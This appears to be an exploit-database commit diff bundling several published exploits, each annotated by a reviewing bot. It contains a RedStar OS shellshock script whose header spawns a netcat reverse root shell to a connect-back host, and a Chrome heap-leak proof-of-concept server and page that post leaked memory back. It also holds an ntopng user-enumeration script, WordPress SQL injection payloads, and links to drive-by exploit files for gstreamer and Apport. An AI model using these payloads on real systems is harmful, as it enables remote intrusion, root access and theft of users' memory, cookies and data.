Both of these issues were reported to the Apport maintainers and a fix was released on 2016-12-14. The CrashDB code injection issue can be tracked with CVE-2016-9949 and the path traversal bug with CVE-2016-9950. An additional problem where arbitrary commands can be called with the “Relaunch” action is tracked by CVE-2016-9951. Id like to thank Martin Pitt and the Ubuntu security team for getting a fix (https://bugs.launchpad.net/apport/+bug/1648806) released so quickly. They have been a pleasure to work with.
I would encourage all security researchers to audit free and open source software if they have time on their hands. Projects such as Tor, Tails, Debian and Ubuntu all need more eyes for audits which can improve the safety of the internet for everyone. There are lots of bugs out there which dont need hardcore memory corruption exploitation skills. Logic bugs can be much more reliable than any ROP chain.
The computer security industry has a serious conflict of interest right now. There is major financial motivation for researchers to find and disclose vulnerability to exploit brokers. Many of the brokers are in the business of keeping problems unfixed. Code execution bugs are valuable. As a data point, I received an offer of more than 10,000 USD from an exploit vendor for these Apport bugs. These financial motivators are only increasing as software gets more secure and bugs become more difficult to find.
To improve security for everyone we need to find sustainable ways to incentivize researchers to find and disclose issues and to get bugs fixed. We cant and we shouldnt rely on researchers giving away their work for free to for-profit vendors. We will not get security like that.
Microsoft and Google have shown a good example with their vulnerability reward programs. The Internet Bug Bounty (https://internetbugbounty.org/) is also doing great work and helping to support research on critical internet software. I hope that they can continue the program and expand their scope in the future. I hope we can cooperatively build a shared and secure internet together.
Source: https://donncha.is/2016/12/compromising-ubuntu-desktop/
Download: https://github.com/DonnchaC/ubuntu-apport-exploitation/archive/6ecfdf798f39fdd49b5929240d90a876c1e97ebb.zip
Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40937.zip
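Review bot: the text names CVE-2016-9949, CVE-2016-9950 and CVE-2016-9951 but gives no affected or fixed Apport version, only "a fix was released on 2016-12-14", so a reader cannot check exposure from this file alone; add a version line at the top. The file holds only the closing section of the write-up, so a one-line summary of each issue next to its CVE would make the entry usable without following the Source link. The import also dropped the apostrophes ("Id", "dont", "cant", "shouldnt"), and the Mirror archive is listed without a checksum while the Download link pins a commit hash.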

57
platforms/linux/local/40938.py Executable file

@ -0,0 +1,57 @@
#!/usr/bin/env python
# RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit
# ========================================================
# BEAM & RSSMON are Webmin based configuration utilities
# that ship with RSS server 3.0. These packages are the
# recommended GUI configuration components and listen on
# a user specified port from 10000/tcp to 65535/tcp. They
# are accessible on the local host only in vanilla install
# unless the firewall is disabled. Both services run with
# full root permissions and can be exploited for LPE or
# network attacks. RSSMON has hardened SELinux policies
# applied which hinder exploitation of this vulnerability
# be limiting access to network resources. Commands are
# still run as root in a blind way.
#
# $ python rsshellshock.py beam 192.168.0.31 10000 192.168.0.10 8080
# [+] RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit
# [-] exploiting shellshock CVE-2014-6271...
# sh: no job control in this shell
# sh-4.1# id
# uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:beam_t:s0-s15:c0.c1023
# sh-4.1#
#
# -- Hacker Fantastic (https://myhackerhouse.com)
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import subprocess
import requests
import sys
import os
def spawn_shell(cbport):
subprocess.call('nc -l ' + cbport, shell=True)
def shellshock(soft,ip,port,cbip,cbport):
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
if soft == "beam":
user_agent = {'User-agent': '() { :; }; /bin/bash -c "rm /tmp/.f;mkfifo /tmp/.f;cat /tmp/.f|/bin/sh -i 2>&1|nc '+cbip+' '+cbport+' >/tmp/.f"'}
else:
shellstring = '() { :; }; /bin/bash -c "%s"' % (cbip)
user_agent = {'User-agent': shellstring}
print "[-] exploiting shellshock CVE-2014-6271..."
myreq = requests.get("https://"+ip+":"+port+"/session_login.cgi", headers = user_agent, verify=False)
if __name__ == "__main__":
print "[+] RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit"
if len(sys.argv) < 5:
print "[-] Use with <beam> <host> <port> <connectback ip> <connectback port>"
print "[-] Or with <rssmon> <host> <port> <cmd>"
sys.exit()
if(sys.argv[1]=="beam"):
newRef=os.fork()
if newRef==0:
shellshock(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],sys.argv[5])
else:
spawn_shell(sys.argv[5])
else:
shellshock(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],0)
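Review bot: the argument check `len(sys.argv) < 5` lets `beam` mode through with one argument too few, after which `sys.argv[5]` raises IndexError in both the forked child and the parent; check for six entries in `beam` mode and five in `rssmon` mode. `spawn_shell()` concatenates `cbport` into `'nc -l ' + cbport` and runs it with `shell=True`, so that argument is parsed by the operator's own shell; pass an argument list without `shell=True`. The committed text has no indentation, so it does not parse as Python, and the header comment reads "be limiting" where "by limiting" is meant.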

38
platforms/linux/local/40943.txt Executable file

@ -0,0 +1,38 @@
## Overview
Full reliable 0day drive-by exploit against Fedora 25 + Google Chrome, by breaking out of Super Nintendo Entertainment System emulation via cascading side effects from a subtle and interesting emulation error.
I had a lot of fun compromising the Linux desktop using 6502 opcodes on the original Nintendo NES (https://scarybeastsecurity.blogspot.com/2016/11/0day-exploit-compromising-linux-desktop.html). Would it be possible to have even more fun? Why, yes it would! My previous NES related exploit suffered from multiple fun-limiting issues:
- Although it was a genuine 0day exploit, it only affected very old Linux distributions. Something affecting bang up to date Linux installs would generate greater lulz.
- The vulnerability that was abused -- a total lack of bounds checking on memory bank mapping -- was somewhat obvious. More fun can often be had with vulnerabilities that are slightly more subtle.
- The lack of “super”! The Super Nintendo Entertainment System (SNES) is even more iconic than the original NES. Regarding its 1990 release, Wikipedia notes (https://en.wikipedia.org/wiki/Super_Nintendo_Entertainment_System) "the resulting social disturbance led the Japanese government to ask video game manufacturers to schedule future console releases on weekends". So we need more Super.
Resolving all the above, I present here a full, working, reliable, 0day exploit for current Linux distributions (Ubuntu 16.04 LTS and Fedora 25). Its a full drive-by download in the context of Fedora. It abuses cascading subtle side effects of an emulation misstep that at first appears extremely difficult to exploit but ends up presenting beautiful and 100% reliable exploitation possibilities.
Youve likely guessed it by now, but the Linux gstreamer media playback framework supports playback of SNES music files by…. emulating the SNES CPU and audio processor, courtesy of Game Music Emu (http://www.slack.net/~ant/libs/audio.html). How cool is that?
- - -
## Demo and impact
Today, the demos are videos instead of images. This first video shows a full, reliable drive-by download against Fedora 25 + Google Chrome. The strong reliability of this exploit makes it work inside Fedoras tracker-extract process, which has highly variable heap state that has frustrated my other exploit attempts. Finally, decent exploit proof of my earlier suspicion that tracker + Google Chrome is very dangerous (https://scarybeastsecurity.blogspot.com/2016/11/0day-poc-risky-design-decisions-in.html):
- https://www.youtube.com/watch?v=WKwRijjqdzY
Exploit file: gnome_calc_fedora_25_libc_2.24-3.spc (rename it to .flac to get it to work as in the video).
- Download: https://security.appspot.com/security/spc/gnome_calc_fedora_25_libc_2.24-3.spc
- Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40943-1.flac
And this second video shows a couple of different exploitation contexts in Ubuntu 16.04 LTS, using the same exploit file for each. Again, this is showcasing the reliability that the underlying vulnerability permits. The different exploited processes (gnome-video-thumbnailer and totem) have very different heap and threading setups:
- https://www.youtube.com/watch?v=wrCLoem6ggM
Exploit file: xcalc_ubuntu_16.04_libc_2.23-0ubuntu3.spc (rename it to .mp3 to get it to work as in the video).
- Download: https://security.appspot.com/security/spc/xcalc_ubuntu_16.04_libc_2.23-0ubuntu3.spc
- Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40943-2.mp3
Impact is mixed. On Ubuntu, the faulty code is installed and on the attack surface by default, if you select the “mp3” option during install -- which I certainly always do. On Fedora, theres a very sensible decision to split gstreamer1-plugins-bad into multiple packages, with only gstreamer1-plugins-bad-free installed by default. This limits the attack surface and does not include Game Music Emu. Of course, the gstreamer framework will happily offer to install gstreamer1-plugins-bad-free-extras, with a very nice UI, if the victim simply tries to open the relevant media file.
As always, the general lack of sandboxing here contributes to the severity. I think we inhabit a world where media parsing sandboxes should be mandatory these days. Theres hope: some of my other recent disclosures appear to have motivated a sandbox for Gnomes tracker (https://bugzilla.gnome.org/show_bug.cgi?id=764786).
Source: https://scarybeastsecurity.blogspot.com/2016/12/redux-compromising-linux-using-snes.html
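Review bot: nothing in the file states which Game Music Emu or gstreamer plugin versions are affected or whether a fix exists; the only version information is the libc build in each exploit file name. Add an affected/fixed line under "## Overview", and move the mitigation already described in the impact paragraph (Fedora installs only gstreamer1-plugins-bad-free by default, which does not include Game Music Emu) up beside it. The import dropped apostrophes ("Its", "Youve", "Fedoras", "theres", "Gnomes"), and the two mirrored binaries are listed without checksums.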


@ -1,3 +1,4 @@
=begin
# Exploit Title: Eir D1000 Wireless Router - WAN Side Remote Command Injection
# Date: 7th November 2016
# Exploit Author: Kenzo
@ -18,6 +19,8 @@ Proof of Concept
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
=end
require 'msf/core'
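Review bot: `=end` sits after the "# This module requires Metasploit" banner, so the module's own header comment is now inside the block comment together with the free-text advisory; move `=end` above the banner so that only the advisory text is wrapped. Ruby recognises `=begin` and `=end` only at the start of a line, which is worth a short comment for whoever edits this header next.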

308
platforms/multiple/dos/40944.py Executable file

@ -0,0 +1,308 @@
'''
Source: http://blog.skylined.nl/20161219001.html
Synopsis
A specially crafted HTTP response can allow a malicious web-page to trigger a out-of-bounds read vulnerability in Google Chrome. The data is read from the main process' memory.
Known affected software, attack vectors and potential mitigations
Google Chrome up to, but not including, 31.0.1650.48
An attacker would need to get a target user to open a specially crafted web-page. Disabling Java­Script does not prevent an attacker from triggering the vulnerable code path, but may prevent exfiltration of information.
Since the affected code has not been changed since 2009, I assume this affects all versions of Chrome released in the last few years.
Details
The Http­Stream­Parser class is used to send HTTP requests and receive HTTP responses. Its read_­buf_ member is a buffer used to store HTTP response data received from the server. Parts of the code are written under the assumption that the response currently being parsed is always stored at the start of this buffer (as returned by read_­buf_->Start­Of­Buffer()), other parts take into account that this may not be the case (read_­buf_->Start­Of­Buffer() + read_­buf_­unused_­offset_). In most cases, responses are removed from the buffer once they have been parsed and any superfluous data is moved to the beginning of the buffer, to be treated as part of the next response. However, the code special cases HTTP 1xx replies and returns a result without removing the request from the buffer. This means that the response to the next request will not be stored at the start of the buffer, but after this HTTP 1xx response and read_­buf_­unused_­offset_ should be used to find where it starts.
The code that special cases HTTP 1xx responses is:
if (end_­of_­header_­offset == -1) {
<<<snip>>>
} else {
// Note where the headers stop.
read_­buf_­unused_­offset_ = end_­of_­header_­offset;
if (response_->headers->response_­code() / 100 == 1) {
// After processing a 1xx response, the caller will ask for the next
// header, so reset state to support that. We don't just skip these
// completely because 1xx codes aren't acceptable when establishing a
// tunnel.
io_­state_ = STATE_­REQUEST_­SENT;
response_­header_­start_­offset_ = -1;
<<<Note: the code above does not remove the HTTP 1xx response from the
buffer.>>>
} else {
<<<Note: the code that follows either removes the response from the buffer
immediately, or expects it to be removed in a call to
Read­Response­Body later.>>>
<<<snip>>>
return result;
}
A look through the code has revealed one location where this can lead to a security issue (also in Do­Read­Headers­Complete). The code uses an offset from the start of the buffer (rather than the start of the current responses) to pass as an argument to a Do­Parse­Response­Headers.
if (result == ERR_­CONNECTION_­CLOSED) {
<<<snip>>>
// Parse things as well as we can and let the caller decide what to do.
int end_­offset;
if (response_­header_­start_­offset_ >= 0) {
io_­state_ = STATE_­READ_­BODY_­COMPLETE;
end_­offset = read_­buf_->offset();
<<<Note: "end_­offset" is relative to the start of the buffer>>>
} else {
io_­state_ = STATE_­BODY_­PENDING;
end_­offset = 0;
<<<Note: "end_­offset" is relative to the start of the current response
i.e. start + read_­buf_­unused_­offset_.>>>
}
int rv = Do­Parse­Response­Headers(end_­offset);
<<<snip>>>
Do­Parse­Response­Headers passes the argument unchanged to Http­Util::Assemble­Raw­Headers:
int Http­Stream­Parser::Do­Parse­Response­Headers(int end_­offset) {
scoped_­refptr<Http­Response­Headers> headers;
if (response_­header_­start_­offset_ >= 0) {
headers = new Http­Response­Headers(Http­Util::Assemble­Raw­Headers(
read_­buf_->Start­Of­Buffer() + read_­buf_­unused_­offset_, end_­offset));
<<<snip>>>
The Http­Util::Assemble­Raw­Headers method takes two arguments: a pointer to a buffer, and the length of the buffer. The pointer is calculated correctly (in Do­Parse­Response­Headers) and points to the start of the current response. The length is the offset that was calculated incorrectly in Do­Read­Headers­Complete. If the current response is preceded by a HTTP 1xx response in the buffer, this length is larger than it should be: the calculated value will be the correct length plus the size of the previous HTTP 1xx response (read_­buf_­unused_­offset_).
std::string Http­Util::Assemble­Raw­Headers(const char* input_­begin,
int input_­len) {
std::string raw_­headers;
raw_­headers.reserve(input_­len);
const char* input_­end = input_­begin + input_­len;
input_­begin was calculated as read_­buf_->Start­Of­Buffer() + read_­buf_­unused_­offset_,
input_­len was incorrectly calculated as len(headers) + read_­buf_­unused_­offset_,
input_­end will be read_­buf_->Start­Of­Buffer() + 2 * read_­buf_­unused_­offset_ + len(headers)
input_­end is now beyond the end of the actual headers. The code will continue to rely on this incorrect value to try to create a copy of the headers, inadvertently making a copy of data that is not part of this response and may not even be part of the read_­buf_ buffer. This could cause the code to copy data from memory that is stored immediately after read_­buf_ into a string that represents the response headers. This string is passed to the renderer process that made the request, allowing a web-page inside the sandbox to read memory from the main process' heap.
An ASCII diagram might be useful to illustrate what is going on:
read_­buf_: "HTTP 100 Continue\r\n...HTTP XXX Current response\r\n...Unused..."
read_­buf_->Start­Of­Buffer() -----^
read_­buf_->capacity() ----------[================================================================]
read_­buf_->offset() ------------[=======================================================]
read_­buf_­unused_­offset_ -------[=======================]
Do­Read­Headers­Complete/Do­Parse­Response­Headers:
end_­offset ---------------------[=======================================================]
Assemble­Raw­Headers:
input_­begin ---------------------------------------------^
input_­len ----------------------------------------------[========================================###############]
error in input_­len value --------------------------------------------------------------[========###############]
(== read_­buf_­unused_­offset_)
Memory read from the main process' heap ---------------------------------------------------------[##############]
Repro
The below proof-of-concept consist of a server that hosts a simple web-page. This web-page uses XMLHttp­Request to make requests to the server. The server responds with a carefully crafted reply to exploit the vulnerability and leak data from the main process' memory in the HTTP headers of the response. The web-page then uses get­All­Response­Headers() to read the leaked data, and posts it to the server, which displays the memory. The Po­C makes no attempt to influence the layout of the main process' memory, so arbitrary data will be shown and access violation may occur which crash Chrome. With the Po­C loaded in one tab, simply browsing the internet in another might show some leaked information from the pages you visit.
Po­C.py:
'''
import Base­HTTPServer, json, sys, socket;
def sploit(o­HTTPServer, s­Body):
i­Read­Size = 2048;
# The size of the HTTP 1xx response determines how many bytes can be read beyond the next response.
# This HTTP 1xx response is padded to allow reading the desired amount of bytes:
s­First­Response = pad("HTTP/1.1 100 %s\r\n\r\n", i­Read­Size);
o­HTTPServer.wfile.write(s­First­Response);
# The size of the second response determines where in the buffer reading of data beyond the response starts.
# For a new connection, the buffer start empty and grows in 4K increments. If the HTTP 1xx response and the second
# response have a combined size of less then 4K, the buffer will be 4K in size. If the second response is padded
# correctly, the first byte read beyond it will be the first byte beyond the buffer, which increases the chance of
# reading something useful.
s­Second­Response = pad("HTTP/1.1 200 %s\r\nx: x", 4 * 1024 - 1 - len(s­First­Response));
o­HTTPServer.wfile.write(s­Second­Response);
o­HTTPServer.wfile.close();
if s­Body:
s­Leaked­Memory = json.loads(s­Body);
assert s­Leaked­Memory.endswith("\r\n"), \
"Expected CRLF is missing: %s" % repr(s­Leaked­Memory);
as­Leaked­Memory­Chunks = s­Leaked­Memory[:-2].split("\r\n");
s­First­Chunk = None;
for s­Leaked­Memory­Chunk in as­Leaked­Memory­Chunks:
if s­Leaked­Memory­Chunk.startswith("x: x"):
s­First­Chunk = s­Leaked­Memory­Chunk[4:];
if s­First­Chunk:
dump(s­First­Chunk);
as­Leaked­Memory­Chunks.remove(s­Leaked­Memory­Chunk);
if len(as­Leaked­Memory­Chunks) == 1:
print "A CR/LF/CRLF separates the above memory chunk from the below chunk:";
elif len(as­Leaked­Memory­Chunks) > 1:
print "A CR/LF/CRLF separates the above memory chunk from the below chunks, their original order is unknown:";
for s­Leaked­Memory­Chunk in as­Leaked­Memory­Chunks:
dump(s­Leaked­Memory­Chunk);
break;
else:
dump(s­Leaked­Memory);
class Request­Handler(Base­HTTPServer.Base­HTTPRequest­Handler):
def handle_­one_­request(self, *tx­Args, **dx­Args):
try:
return Base­HTTPServer.Base­HTTPRequest­Handler.handle_­one_­request(self, *tx­Args, **dx­Args);
except socket.error:
pass;
def do_­GET(self):
self.do_­GET_­or_­POST();
def do_­POST(self):
self.do_­GET_­or_­POST();
def __send­File­Response(self, i­Code, s­File­Path):
try:
o­File = open(s­File­Path, "rb");
s­Content = o­File.read();
o­File.close();
except:
self.__send­Response(500, "Cannot find %s" % s­File­Path);
else:
self.__send­Response(i­Code, s­Content);
def __send­Response(self, i­Code, s­Content):
self.send_­response(i­Code);
self.send_­header("accept-ranges", "bytes");
self.send_­header("cache-control", "no-cache, must-revalidate");
self.send_­header("content-length", str(len(s­Content)));
self.send_­header("content-type", "text/html");
self.send_­header("date", "Sat Aug 28 1976 09:15:00 GMT");
self.send_­header("expires", "Sat Aug 28 1976 09:15:00 GMT");
self.send_­header("pragma", "no-cache");
self.end_­headers();
self.wfile.write(s­Content);
self.wfile.close();
def do_­GET_­or_­POST(self):
try:
try:
i­Content­Length = int(self.headers.getheader("content-length"));
except:
s­Body = "";
else:
s­Body = self.rfile.read(i­Content­Length);
if self.path in gds­Files:
return self.__send­File­Response(200, gds­Files[self.path]);
elif self.path in gds­Functions:
return gds­Functions[self.path](self, s­Body);
else:
return self.__send­Response(404, "Not found");
except:
self.server.server_­close();
raise;
def pad(s­Template, i­Size):
i­Padding = i­Size - len(s­Template % "");
return s­Template % (i­Padding * "A");
def dump(s­Memory):
as­DWords = []; i­DWord = 0; as­Bytes = []; as­Chars = [];
print "-%s-.-%s-.-%s" % (
("%d DWORDS" % (len(s­Memory) >> 2)).center(35, "-"),
("%d BYTES" % len(s­Memory)).center(47, "-"),
"ASCII".center(16, "-"));
for i­Index in xrange(len(s­Memory)):
s­Byte = s­Memory[i­Index];
i­Byte = ord(s­Byte);
as­Chars.append(0x1f < i­Byte < 0x80 and s­Byte or ".");
as­Bytes.append("%02X" % i­Byte);
i­Bit­Offset = (i­Index % 4) * 8;
i­DWord += i­Byte << i­Bit­Offset;
if i­Bit­Offset == 24 or (i­Index == len(s­Memory) - 1):
as­DWords.append({
0: " %02X",
8: " %04X",
16:" %06X",
24:"%08X"
}[i­Bit­Offset] % i­DWord);
i­DWord = 0;
if (i­Index % 16 == 15) or (i­Index == len(s­Memory) - 1):
print " %-35s | %-47s | %s" % (" ".join(as­DWords), " ".join(as­Bytes), "".join(as­Chars));
as­DWords = []; as­Bytes = []; as­Chars = [];
if __name__ == "__main__":
gds­Files = {
"/": "proxy.html",
}
gds­Functions = {
"/sploit": sploit,
}
tx­Address = ("localhost", 28876);
o­HTTPServer = Base­HTTPServer.HTTPServer(tx­Address, Request­Handler);
print "Serving at: http://%s:%d" % tx­Address;
try:
o­HTTPServer.serve_­forever();
except Keyboard­Interrupt:
pass;
o­HTTPServer.server_­close();
'''
Proxy.html:
<!doctype html>
<html>
<head>
<script>
var i­Threads = 1; // number of simultanious request "threads", higher = faster extraction of data
var i­Delay = 1000; // delay between requests in each "thread", lower = faster extraction of data
function request­Loop(s­Data­To­Send) {
var o­XMLHttp­Request = new XMLHttp­Request();
o­XMLHttp­Request.open("POST", "/sploit", true);
o­XMLHttp­Request.onreadystatechange = function () {
if (o­XMLHttp­Request.ready­State === 4) {
if (o­XMLHttp­Request.status == 200) {
var s­Headers = o­XMLHttp­Request.get­All­Response­Headers();
console.log("response =" + o­XMLHttp­Request.status + " " + o­XMLHttp­Request.status­Text);
console.log("headers =" + s­Headers.length + ":[" + s­Headers + "]");
if (i­Delay > 0) {
set­Timeout(function() {
request­Loop(s­Headers);
}, i­Delay);
} else {
request­Loop(s­Headers);
}
} else {
document.write("Server failed!");
}
}
}
o­XMLHttp­Request.send(s­Data­To­Send ? JSON.stringify(s­Data­To­Send) : "");
}
window.add­Event­Listener("load", function () {
for (var i = 0; i < i­Threads; i++) request­Loop("");
}, true);
</script>
</head>
<body>
</body>
</html>
Exploit
The impact depends on what happens to be stored on the heap immediately following the buffer. Since a web-page can influence the activities of the main process (e.g. it can ask it to make other HTTP requests), a certain amount of control over the heap layout is possible. An attacker could attempt to create a "heap feng shui"-like attack where careful manipulation of the main process' activities allow reading of various types of information from the main process' heap. The most obvious targets that come to mind are http request/response data for different domains, such as log-in cookies, or session keys and function pointers that can be used to bypass ASLR/DEP. There are undoubtedly many other forms of interesting information that can be revealed in this way.
There are little limits to the number of times an attacker can exploit this vulnerability, assuming the attacker can avoid triggering an access violation: if the buffer happens to be stored at the end of the heap, attempts to exploit this vulnerability could trigger an access violation/segmentation fault when the code attempts to read beyond the buffer from unallocated memory addresses.
Fix
I identified and tested two approaches to fixing this bug:
- Fix the code where it relies on the response being stored at the start of the buffer.
This addresses the incorrect addressing of memory that causes this vulnerability in various parts of the code. The design to keep HTTP 1xx responses in the buffer remains unchanged.
- Remove HTTP 1xx responses from the buffer.
There was inline documentation in the source that explained why HTTP 1xx responses were handled in a special way, but it didn't make much sense to me. This fix changes the design to no longer keep the HTTP 1xx response in the buffer. There is an added benefit to this fix in that it removes a potential Do­S attack, where a server responds with many large HTTP 1xx replies, all of which are kept in memory and eventually cause an OOM crash in the main process.
The later fix was eventually implemented.
Time-line
27 September 2013: This vulnerability and two patches were submitted to the Chromium bugtracker.
2 October 2013: A patch for this vulnerability was submitted by Google.
12 November 2013: This vulnerability was address in version 31.0.1650.48.
19 December 2016: Details of this vulnerability are released.
'''
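Review bot: identifiers throughout the file carry soft-hyphen characters copied from the blog rendering (inside BaseHTTPServer, sBody, handle_one_request and most other names), so the file is not valid Python as committed; strip U+00AD and restore the indentation before merging. `gdsFiles` maps "/" to "proxy.html", but that page exists only inside the trailing docstring under the name "Proxy.html", so the server answers with its own 500 "Cannot find" response until it is saved as a separate file; say so in the Repro paragraph. The fixed version 31.0.1650.48 is stated, which is good; the time-line has "was address" for "was addressed".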


@ -0,0 +1,48 @@
# Exploit title: ntopng user enumeration
# Author: Dolev Farhi
# Contact: dolevf at protonmail.com
# Date: 04-08-2016
# Vendor homepage: ntop.org
# Software version: v.2.5.160805
#!/usr/env/python
import os
import sys
import urllib
import urllib2
import cookielib
server = 'ip.add.re.ss'
username = 'ntopng-user'
password = 'ntopng-password'
timeout = 6
if len(sys.argv) < 2:
print("usage: %s <usernames file>") % sys.argv[0]
sys.exit(1)
if not os.path.isfile(sys.argv[1]):
print("%s doesn't exist") % sys.argv[1]
sys.exit(1)
try:
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
login_data = urllib.urlencode({'user' : username, 'password' :
password, 'referer' : '/authorize.html'})
opener.open('http://' + server + ':3000/authorize.html', login_data,
timeout=timeout)
print("\nEnumerating ntopng...\n")
with open(sys.argv[1]) as f:
for user in f:
user = user.strip()
url = 'http://%s:3000/lua/admin/validate_new_user.lua?user=%s&netw
orks=0.0.0.0/0,::/0' % (server, user)
resp = opener.open(url)
if "existing" not in resp.read():
print "[NOT FOUND] %s" % user
else:
print "[FOUND] %s" % user
except Exception as e:
print e
sys.exit(1)
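Review bot: the URL string literal is hard-wrapped in the middle of a word (`...?user=%s&netw` on one line, `orks=0.0.0.0/0,::/0'` on the next), which is a syntax error; rejoin it. `#!/usr/env/python` is not on the first line and is not a valid interpreter path (`/usr/bin/env python`). The `user` value is interpolated into the query string without `urllib.quote`, and the `print(...) % ...` lines sit beside bare `print` statements, so the file works only on Python 2 without saying so. The header gives the tested version v.2.5.160805 but no vendor-notification or fix status.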

31
platforms/php/webapps/40939.txt Executable file

@ -0,0 +1,31 @@
# Exploit Title: WP Support Plus Responsive Ticket System 7.1.3 WordPress Plugin Sql Injection
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/
# Software Link: https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 7.1.3
# Tested on: Ubuntu 14.04
1 - Description:
Type user access: any user. $_POST[cat_id] is not escaped. Is accessible for any user.
http://lenonleite.com.br/en/blog/2016/12/13/wp-support-plus-responsive-ticket-system-wordpress-plugin-sql-injection/
2 - Proof of Concept:
<form action="http://target/wp-admin/admin-ajax.php" method="post">
<input type="text" name="action" value="wpsp_getCatName">
<input type="text" name="cat_id" value="0 UNION SELECT 1,CONCAT(name,CHAR(58),slug),3 FROM wp_terms WHERE term_id=1">
<input type="submit" name="">
</form>
3 - Timeline:
- 12/12/2016 Discovered
- 13/12/2016 Vendor notifed
- 16/12/2016 Resolve issue version 7.1.5
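Review bot: the description says "any user" twice without stating whether the `wpsp_getCatName` action is reachable without authentication; say so explicitly, since that decides who is exposed. The fixed release 7.1.5 appears only in the last timeline line; put it in the header next to `# Version: 7.1.3` so the remedy is visible at a glance. The header has no `# Date:` field, the timeline dates are dd/mm/yyyy without saying so, and "notifed" is a typo.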

42
platforms/php/webapps/40940.txt Executable file

@ -0,0 +1,42 @@
# Exploit Title: WP Private Messages 1.0.1 Plugin WordPress Sql Injection
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/wp-private-messages/
# Software Link: https://wordpress.org/plugins/wp-private-messages/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.0.1
# Tested on: Ubuntu 14.04
1 - Description:
Type user access: registered user.
$_GET[id] is not escaped. Url is accessible for every registered user.
http://lenonleite.com.br/en/blog/2016/12/16/wp-private-messages-1-0-1-plugin-wordpress-sql-injection/
2 - Proof of Concept:
1 Login as regular user (created using wp-login.php?action=register):
2 -Using :
http://target/wp-admin/users.php?page=wp-private-messages%2Fwpu_private_messages.php&wpu=readid=0+UNION+SELECT+1,2,2,name,slug,6,7,8,9,10,11,12+FROM+wp_terms+WHERE++term_id%3D1&r=recieved
Obs: Use id number of your user in third column after word select. For example:
…UNION+SELECT+1,2,1,name,slug…
…UNION+SELECT+1,2,2,name,slug…
…UNION+SELECT+1,2,3,name,slug…
…UNION+SELECT+1,2,4,name,slug…
…UNION+SELECT+1,2,5,name,slug…
3 - Timeline:
12/12/2016 Discovered
13/12/2016 Vendor not finded
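Review bot: the timeline ends at "13/12/2016 Vendor not finded" with no fixed version, so the header should state plainly that no patched release of 1.0.1 existed at the time of writing. The header has no `# Date:` field, the PoC steps are numbered inconsistently ("1 Login", "2 -Using :"), and "Vendor not finded" should read "Vendor not found".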

28
platforms/php/webapps/40941.txt Executable file

@ -0,0 +1,28 @@
# Exploit Title: Unauthenticated SQL injeciton in 404 plugin for Wordpress v1.0
# Google Dork: N/A
# Date: 17/12/2016
# Exploit Author: Ahmed Sherif (Deloitte)
# Vendor Homepage: N/A
# Software Link: https://wordpress.org/plugins/404-redirection-manager/
# Version: V1.0
# Tested on: Linux Mint
# CVE : N/A
The plugin does not properly sanitize the user input. Hence, it was
vulnerable to SQL injection.
The vulnerable page is : custom/lib/cf.SR_redirect_manager.class.php on line 356
[#] Proof of Concept (PoC):
GET /path-to-wordpress/%27%29%20AND%20%28SELECT%20%2a%20FROM%20%28SELECT%28SLEEP%285-%28IF%28%27a%27%3D%27a%27%2C0%2C5%29%29%29%29%29FPYG%29%20AND%20%28%27SQL%27%3D%27SQL
HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wp-settings-time-1=1480877693
Connection: close*
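Review bot: the title calls the target "404 plugin for Wordpress v1.0" while the Software Link points at 404-redirection-manager; use the plugin's actual name in the title and fix the typo "injeciton". The request line is wrapped so that `HTTP/1.1` sits on a line of its own, and the last header reads `Connection: close*` with a stray asterisk. No vendor-notification or fix status is given, so a reader cannot tell whether a patched version exists.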